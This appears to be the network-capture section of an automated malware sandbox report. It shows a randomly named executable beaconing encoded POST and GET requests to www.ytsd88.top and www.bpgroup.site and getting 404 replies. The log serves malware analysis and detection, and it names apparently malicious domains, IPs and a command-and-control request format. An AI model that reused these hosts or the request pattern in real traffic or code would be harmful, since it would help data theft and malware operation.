                                                        Data Raw: 4b 7a 42 34 37 6e 56 3d 49 72 71 4f 51 36 78 65 37 33 49 49 69 74 39 47 4d 54 71 67 6b 72 66 4e 57 6d 51 6e 31 4c 46 67 4c 37 6f 71 6b 67 46 36 64 72 65 43 39 36 46 44 66 64 6b 6d 4c 44 66 52 6d 53 63 33 56 41 45 72 76 37 4a 47 65 38 59 5a 4a 6f 36 62 4c 47 70 69 7a 78 67 58 73 37 64 6a 66 33 55 78 56 6f 62 45 51 53 47 51 6b 46 63 58 61 55 41 66 6c 30 50 64 4e 79 38 6c 49 53 50 43 52 67 6b 42 52 4a 2b 4e 44 6e 4f 45 2b 4d 55 4f 64 78 44 47 4c 49 39 46 54 38 4f 73 72 38 38 69 50 58 58 34 72 44 37 61 66 2b 4b 35 49 6d 2f 45 4c 59 6a 49 34 6f 36 4c 62 54 50 59 42 49 4a 57 31 53 4e 42 35 36 4f 31 41 35 47 62 43 45 68 46 62 4c 2b 77 70 48 59 70 62 67 3d 3d
                                                        Data Ascii: KzB47nV=IrqOQ6xe73IIit9GMTqgkrfNWmQn1LFgL7oqkgF6dreC96FDfdkmLDfRmSc3VAErv7JGe8YZJo6bLGpizxgXs7djf3UxVobEQSGQkFcXaUAfl0PdNy8lISPCRgkBRJ+NDnOE+MUOdxDGLI9FT8Osr88iPXX4rD7af+K5Im/ELYjI4o6LbTPYBIJW1SNB56O1A5GbCEhFbL+wpHYpbg==
                                                        Jan 10, 2025 20:27:24.879007101 CET574INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Fri, 10 Jan 2025 19:27:24 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 409
                                                        Connection: close
                                                        ETag: "66d016cf-199"
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                        Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.104997847.76.213.197806544C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 10, 2025 20:27:26.521656990 CET1744OUTPOST /8qt7/ HTTP/1.1
                                                        Host: www.ytsd88.top
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.ytsd88.top
                                                        Referer: http://www.ytsd88.top/8qt7/
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 1232
                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                        Data Raw: 4b 7a 42 34 37 6e 56 3d 49 72 71 4f 51 36 78 65 37 33 49 49 69 74 39 47 4d 54 71 67 6b 72 66 4e 57 6d 51 6e 31 4c 46 67 4c 37 6f 71 6b 67 46 36 64 72 57 43 39 49 39 44 66 38 6b 6d 5a 54 66 52 6f 79 63 4d 56 41 45 4d 76 34 35 43 65 38 55 4a 4a 71 43 62 5a 56 68 69 6e 51 67 58 33 4c 64 6a 41 48 55 77 4e 49 62 52 51 53 58 5a 6b 45 73 58 61 55 41 66 6c 32 48 64 5a 58 49 6c 4b 53 50 42 5a 41 6b 4e 56 4a 2b 6c 44 6d 71 55 2b 4e 67 77 63 41 6a 47 4c 6f 4e 46 63 75 57 73 32 4d 38 67 4f 58 58 67 72 44 33 52 66 2b 57 31 49 6d 4c 75 4c 59 62 49 31 73 37 4c 45 79 33 51 63 62 70 32 72 68 39 55 32 64 47 6d 4d 39 7a 46 57 57 35 48 49 35 4c 37 2f 6a 78 48 47 74 73 65 69 72 51 42 30 36 2f 31 50 4c 6b 69 5a 67 37 6f 51 6c 42 35 44 48 6b 42 41 6d 4d 65 69 62 32 4f 50 55 55 46 47 2b 79 6f 37 30 42 72 7a 6b 71 79 63 6f 53 47 44 50 6b 45 69 4b 54 75 64 73 68 34 47 4a 6e 6a 4a 48 65 46 54 34 72 48 51 6d 33 6c 43 49 57 6d 62 72 30 4d 66 4e 59 62 79 66 51 56 56 67 6e 39 63 54 2f 41 6b 4a 42 32 46 6f 44 38 77 79 57 50 34 6f [TRUNCATED]
                                                        Data Ascii: KzB47nV=IrqOQ6xe73IIit9GMTqgkrfNWmQn1LFgL7oqkgF6drWC9I9Df8kmZTfRoycMVAEMv45Ce8UJJqCbZVhinQgX3LdjAHUwNIbRQSXZkEsXaUAfl2HdZXIlKSPBZAkNVJ+lDmqU+NgwcAjGLoNFcuWs2M8gOXXgrD3Rf+W1ImLuLYbI1s7LEy3Qcbp2rh9U2dGmM9zFWW5HI5L7/jxHGtseirQB06/1PLkiZg7oQlB5DHkBAmMeib2OPUUFG+yo70BrzkqycoSGDPkEiKTudsh4GJnjJHeFT4rHQm3lCIWmbr0MfNYbyfQVVgn9cT/AkJB2FoD8wyWP4owKL93oqKzPjQKjTFrieUzNFlPQQuatsRrn/sbjRHxGx/fhvY3W59e/piC7+NM4PsuVjRvWOjtMj6PFyzKcblFXasa4Ve/J9mnRknRfqWZ1GhlSxeibNNzY6ssfMyndbPoapFGjc2iocmljsRV3kPxAkdLpBMxOV+erlk5i6GyG2bIxGGp37QnU5zgnnIB/zGZ9hy/ZxQcQPRu2rdXTZOVeAHlhNzWc2lgV8w9MlToDoxl7tzFDPtnVCNh4VuoOC2SySiBS6mIgagvatfSkRuaFJ+Ze/s7b9hyvRZT7oSMuFkgU7wzv79Zym5kNh4nxCKo8BqXsgE6J3W8JP4sEyHsFqcSKEKmLmooSzkzu9v92Pl8gk340nMalaPRSv8U37wpdAl3G6oYYhzykUCoKIlYvZcRY43GPfFUp9ILAW4Eaclb+jZwo+z7FcVTnZPNrPCd7h64sMCj/32adCL7yCWAee1649NJTS9E1OzSVrGMDIoV1XE5Ii86Yt64CkTI030I2GEs2iIT+pN0UBF464LI51Yg+zRg4rFqcltEESxOYzTei2z+hjbjk7p3D88hQLrAOB8sE3JcXr3EOG4T5xcp/uB0UEuuK2srMPCaS3X9EiSAPCiLsPmfpEKxy9yk66ERCCT/HFRSEp6Uf7d6s5Ma1xCi109hNY0lq [TRUNCATED]
                                                        Jan 10, 2025 20:27:27.630928040 CET574INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Fri, 10 Jan 2025 19:27:27 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 409
                                                        Connection: close
                                                        ETag: "66d016cf-199"
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                        Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.104997947.76.213.197806544C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 10, 2025 20:27:29.109637022 CET453OUTGET /8qt7/?KzB47nV=FpCuTMU+yGtduI5RRmSeut/xWTwd9fsLSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXspxWYm91P5vgQDerxUIIQwwTsV+rYA==&ity41=G4jxKXr HTTP/1.1
                                                        Host: www.ytsd88.top
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                        Jan 10, 2025 20:27:30.033190966 CET574INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Fri, 10 Jan 2025 19:27:29 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 409
                                                        Connection: close
                                                        ETag: "66d016cf-199"
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                        Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.104998074.48.143.82806544C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 10, 2025 20:27:35.534235954 CET713OUTPOST /mlxg/ HTTP/1.1
                                                        Host: www.bpgroup.site
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.bpgroup.site
                                                        Referer: http://www.bpgroup.site/mlxg/
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 196
                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                        Data Raw: 4b 7a 42 34 37 6e 56 3d 52 53 62 35 4c 54 70 43 43 46 74 42 55 34 5a 68 66 33 66 42 76 31 69 59 76 48 7a 56 4f 34 37 6f 7a 48 38 47 76 63 62 6c 78 72 43 49 39 34 41 61 65 41 74 50 6f 4d 45 67 54 7a 45 47 5a 41 37 75 6c 78 37 42 42 57 38 44 55 30 35 77 78 58 70 4c 48 62 76 4b 4f 73 39 38 5a 44 62 4c 47 69 7a 73 76 52 53 6b 74 6d 4e 73 35 38 36 44 77 58 47 49 66 46 61 4c 31 54 79 53 4f 57 6c 50 70 43 58 78 61 30 74 35 32 6f 57 2f 42 62 76 38 41 44 76 70 78 4d 2f 38 74 4c 50 7a 56 6e 4f 37 68 70 66 58 6f 67 34 74 58 78 65 56 45 36 74 31 70 49 74 38 71 33 74 6b 73 61 66 47 73 46 77 41
                                                        Data Ascii: KzB47nV=RSb5LTpCCFtBU4Zhf3fBv1iYvHzVO47ozH8GvcblxrCI94AaeAtPoMEgTzEGZA7ulx7BBW8DU05wxXpLHbvKOs98ZDbLGizsvRSktmNs586DwXGIfFaL1TySOWlPpCXxa0t52oW/Bbv8ADvpxM/8tLPzVnO7hpfXog4tXxeVE6t1pIt8q3tksafGsFwA
                                                        Jan 10, 2025 20:27:36.087412119 CET1236INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 1251
                                                        date: Fri, 10 Jan 2025 19:27:35 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                        Jan 10, 2025 20:27:36.087450027 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                        Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.104998174.48.143.82806544C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 10, 2025 20:27:38.083345890 CET737OUTPOST /mlxg/ HTTP/1.1
                                                        Host: www.bpgroup.site
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.bpgroup.site
                                                        Referer: http://www.bpgroup.site/mlxg/
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 220
                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                        Data Raw: 4b 7a 42 34 37 6e 56 3d 52 53 62 35 4c 54 70 43 43 46 74 42 55 59 70 68 63 55 33 42 2f 6c 69 5a 6a 6e 7a 56 45 59 37 73 7a 48 41 47 76 59 44 31 78 5a 57 49 39 5a 77 61 50 78 74 50 6b 73 45 67 59 54 46 4f 64 41 37 6c 6c 78 32 2b 42 55 6f 44 55 30 74 77 78 57 5a 4c 47 73 44 4a 63 73 39 2b 52 6a 62 46 49 43 7a 73 76 52 53 6b 74 6d 5a 47 35 38 69 44 77 48 32 49 5a 6b 61 49 30 54 79 54 50 57 6c 50 74 43 58 31 61 30 74 68 32 70 62 55 42 64 7a 38 41 43 66 70 78 34 6a 2f 2b 72 50 31 4c 58 50 50 6f 64 53 6c 67 41 6f 6f 66 52 57 57 65 35 45 51 75 70 51 37 37 6d 4d 7a 2f 74 44 49 69 44 46 71 57 57 6a 35 73 64 76 37 37 4a 37 74 4a 4d 49 71 75 6b 31 4a 43 67 3d 3d
                                                        Data Ascii: KzB47nV=RSb5LTpCCFtBUYphcU3B/liZjnzVEY7szHAGvYD1xZWI9ZwaPxtPksEgYTFOdA7llx2+BUoDU0twxWZLGsDJcs9+RjbFICzsvRSktmZG58iDwH2IZkaI0TyTPWlPtCX1a0th2pbUBdz8ACfpx4j/+rP1LXPPodSlgAoofRWWe5EQupQ77mMz/tDIiDFqWWj5sdv77J7tJMIquk1JCg==
                                                        Jan 10, 2025 20:27:38.639672995 CET1236INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 1251
                                                        date: Fri, 10 Jan 2025 19:27:38 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                        Jan 10, 2025 20:27:38.639697075 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                        Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.104998274.48.143.82806544C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 10, 2025 20:27:40.630244970 CET1750OUTPOST /mlxg/ HTTP/1.1
                                                        Host: www.bpgroup.site
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.bpgroup.site
                                                        Referer: http://www.bpgroup.site/mlxg/
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 1232
                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                        Data Raw: 4b 7a 42 34 37 6e 56 3d 52 53 62 35 4c 54 70 43 43 46 74 42 55 59 70 68 63 55 33 42 2f 6c 69 5a 6a 6e 7a 56 45 59 37 73 7a 48 41 47 76 59 44 31 78 5a 4f 49 38 72 34 61 64 69 46 50 71 4d 45 67 44 7a 46 4e 64 41 37 43 6c 78 75 79 42 55 6b 31 55 32 56 77 77 77 74 4c 42 64 44 4a 57 73 39 2b 64 44 62 49 47 69 79 30 76 52 43 67 74 6d 4a 47 35 38 69 44 77 42 79 49 65 31 61 49 35 7a 79 53 4f 57 6c 35 70 43 58 64 61 30 46 78 32 70 65 76 42 72 44 38 41 69 50 70 71 72 4c 2f 39 4c 50 33 4b 58 50 58 6f 61 61 2b 67 41 6b 65 66 53 4b 34 65 35 73 51 73 38 4e 76 69 33 34 32 38 76 66 51 74 41 39 75 62 33 53 51 67 73 37 38 32 6f 66 6d 63 4d 46 68 75 6c 59 54 65 69 77 44 45 4d 66 62 38 30 6b 61 35 58 65 33 33 76 75 72 73 6f 49 6d 51 4e 72 59 75 46 36 55 4c 52 61 67 34 5a 4d 72 6d 58 4c 6e 62 6e 79 53 77 79 71 69 31 69 78 70 42 6c 7a 68 78 4f 79 66 6b 73 49 33 71 56 41 36 6b 41 43 74 7a 6d 48 6b 51 6d 4d 71 6b 37 55 33 61 44 61 35 47 55 78 53 72 73 32 31 6a 55 32 76 31 6a 67 45 6b 4b 35 64 4a 67 36 43 75 58 4c 77 70 69 [TRUNCATED]
                                                        Data Ascii: KzB47nV=RSb5LTpCCFtBUYphcU3B/liZjnzVEY7szHAGvYD1xZOI8r4adiFPqMEgDzFNdA7ClxuyBUk1U2VwwwtLBdDJWs9+dDbIGiy0vRCgtmJG58iDwByIe1aI5zySOWl5pCXda0Fx2pevBrD8AiPpqrL/9LP3KXPXoaa+gAkefSK4e5sQs8Nvi3428vfQtA9ub3SQgs782ofmcMFhulYTeiwDEMfb80ka5Xe33vursoImQNrYuF6ULRag4ZMrmXLnbnySwyqi1ixpBlzhxOyfksI3qVA6kACtzmHkQmMqk7U3aDa5GUxSrs21jU2v1jgEkK5dJg6CuXLwpiVFkn6qB9mBgfZPAuP3baXzhTvRMCyYHu1rcdwfx5f8llCVFRShhM+UVDIBdc5QSD7NN/0H/IS4f14FkRY/gjLiZ8v924mK4QHRGTfHASVEYK9Z7jFfN0hYwUKiJU25yXQz+2yitkE5qOw40kDa8Ia4jHMbtjSO/2mIWXVG8Z6Gt48zFgs0VxVSdgkWwPwCs6pQSHFq0q/hjmicmn+/WCaXh0wdI5mkGdGX5vzFC2h6Ht5TbcuNr7VaOk1K+mYZf22JsYOD15zvP8wu4abVZOpgH5ITxJqKaiJ7ugBK8XrE+JBiqJgNGbJ+8Z637JqoAYouY1VFXtiN01ymY3ejSbNCeNwMQvXqTF1tSYTuGBtFHLEhDGTaF+mJ1JOJfnO16nqCiYmuVxggXifudbyogygpWdpaeNpN4a9RyBKLFaiqLPyi98OhYF7LjHu10bcAt8mSP/lgFFlKm07ae/7HaIZduJ1wbRuF6mKDpaY6vRlN2LNGq3gQboSJiM/paHfLhpMvUlNKXwaR/mAvYEC/Oo2UIaHShOE6xz95Att4DiqIVHgUjiO8k1dfB54hQXpw0kdAAaANFcyi8Ke8tMmdex5vrOaUYeRSNWiHmNm4YOSN4TZIXWYSEhrSUf+SsmW/HZ33tHrI